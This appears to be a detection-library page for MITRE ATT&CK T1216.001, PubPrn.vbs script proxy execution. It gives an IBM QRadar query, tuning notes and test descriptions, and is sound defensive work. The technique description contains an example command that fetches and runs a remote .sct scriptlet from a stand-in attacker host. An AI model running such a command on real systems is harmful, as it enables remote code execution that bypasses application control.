T1216.001 IBM QRadar · QRadar

Detect PubPrn in IBM QRadar

Adversaries may abuse PubPrn.vbs to proxy execution of malicious remote scriptlet files. PubPrn.vbs is a Microsoft-signed Visual Basic Script located at C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs that is designed to publish printers to Active Directory Domain Services. Because the script is signed by Microsoft, it can be used to bypass application control solutions that trust Microsoft-signed code. Adversaries pass a script: URI scheme as the second parameter (e.g., pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct) to fetch and execute a remote COM scriptlet (.sct) file via scrobj.dll. The script is typically invoked via cscript.exe or wscript.exe. Windows 10 and later versions restrict the second parameter to LDAP:// URIs, mitigating the remote code execution vector on patched systems; however, legacy environments and custom scripts may remain vulnerable.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Sub-technique
T1216.001 PubPrn
Canonical reference
https://attack.mitre.org/techniques/T1216/001/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') AS "Event Time",
  LOGSOURCENAME(logsourceid) AS "Log Source",
  sourceip AS "Source IP",
  username AS "Username",
  "FileName",
  "CommandLine",
  "ParentImage",
  "ParentCommandLine",
  CASE
    WHEN LOWER("CommandLine") LIKE '%script:%' THEN 1 ELSE 0
  END AS "HasScriptMoniker",
  CASE
    WHEN LOWER("CommandLine") LIKE '%http://%' OR LOWER("CommandLine") LIKE '%https://%' THEN 1 ELSE 0
  END AS "HasHTTP",
  CASE
    WHEN LOWER("CommandLine") LIKE '%.sct%' THEN 1 ELSE 0
  END AS "HasSCT"
FROM events
WHERE
  LOGSOURCETYPENAME(devicetype) ILIKE '%Microsoft Windows Security Event Log%'
  OR LOGSOURCETYPENAME(devicetype) ILIKE '%Sysmon%'
AND (
  LOWER("FileName") LIKE '%cscript.exe%'
  OR LOWER("FileName") LIKE '%wscript.exe%'
)
AND LOWER("CommandLine") LIKE '%pubprn%'
AND (
  LOWER("CommandLine") LIKE '%script:%'
  OR LOWER("CommandLine") LIKE '%.sct%'
)
LAST 24 HOURS
ORDER BY devicetime DESC
high severity high confidence

Detects PubPrn.vbs proxy execution (T1216.001) in IBM QRadar by querying Windows Security or Sysmon log sources for cscript.exe or wscript.exe process creation events where the command line references pubprn and contains a script: URI moniker or .sct COM scriptlet path. Computes individual indicator flags for analyst triage.

Data Sources

IBM QRadar SIEMMicrosoft Windows Security Event Log DSMSysmon DSM via WinCollect or syslog

Required Tables

events

False Positives & Tuning

  • Printer provisioning automation scripts in enterprise environments that call pubprn.vbs programmatically — validate against CMDB printer management workflows
  • Security tooling or SOAR playbooks that invoke pubprn.vbs as part of an authorized LOLBin detection test harness
  • Legacy Windows Server environments running custom VBScript-based print management solutions that construct pubprn.vbs arguments dynamically — correlate with known asset inventory
Download portable Sigma rule (.yml)

Other platforms for T1216.001

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PubPrn Script Moniker Proxy Execution via HTTP

    Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1:8080/payload.sct'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 with same command line if audit policy is enabled. Sysmon Event ID 7: scrobj.dll may be loaded if script: URI processing is initiated before the connection fails.

  2. Test 2PubPrn Execution via HTTPS with .sct Extension

    Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'pubprn.vbs', 'script:', 'https://', and '.sct'. Sysmon Event ID 22: DNS query attempt for 'localhost' from cscript.exe. Sysmon Event ID 3: Network connection attempt on port 443. Security Event ID 4688 if command line auditing is enabled.

  3. Test 3PubPrn via wscript.exe Instead of cscript.exe

    Expected signal: Sysmon Event ID 1: Process Create with Image=wscript.exe (NOT cscript.exe), CommandLine containing 'pubprn.vbs' and 'script:http://'. Sysmon Event ID 3: Connection attempt to 127.0.0.1:9999. No console window spawned (wscript behavior). Security Event ID 4688 with full command line if auditing enabled.

  4. Test 4PubPrn Invocation from cmd.exe Parent (Simulated Phishing Chain)

    Expected signal: Sysmon Event ID 1 (cmd.exe): Process Create for cmd.exe with /c argument. Sysmon Event ID 1 (cscript.exe): Process Create with ParentImage=cmd.exe, CommandLine containing 'pubprn.vbs script:http://'. Security Event IDs 4688 x2 for both process creations. Parent-child chain: cmd.exe -> cscript.exe visible in EDR process tree.

Last updated: 2026-04-19 Research depth: deep
References (8)

Unlock Pro Content

Get the full detection package for T1216.001 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1216System Script Proxy Execution

Related Sub-techniques

T1216.002SyncAppvPublishingServer

Related Techniques

T1216System Script Proxy ExecutionT1059.005Visual BasicT1059.003Windows Command ShellT1218System Binary Proxy ExecutionT1218.010Regsvr32T1218.011Rundll32T1105Ingress Tool TransferT1027Obfuscated Files or InformationT1553.002Code Signing

Same Tactic: Defense Evasion

Popular Detections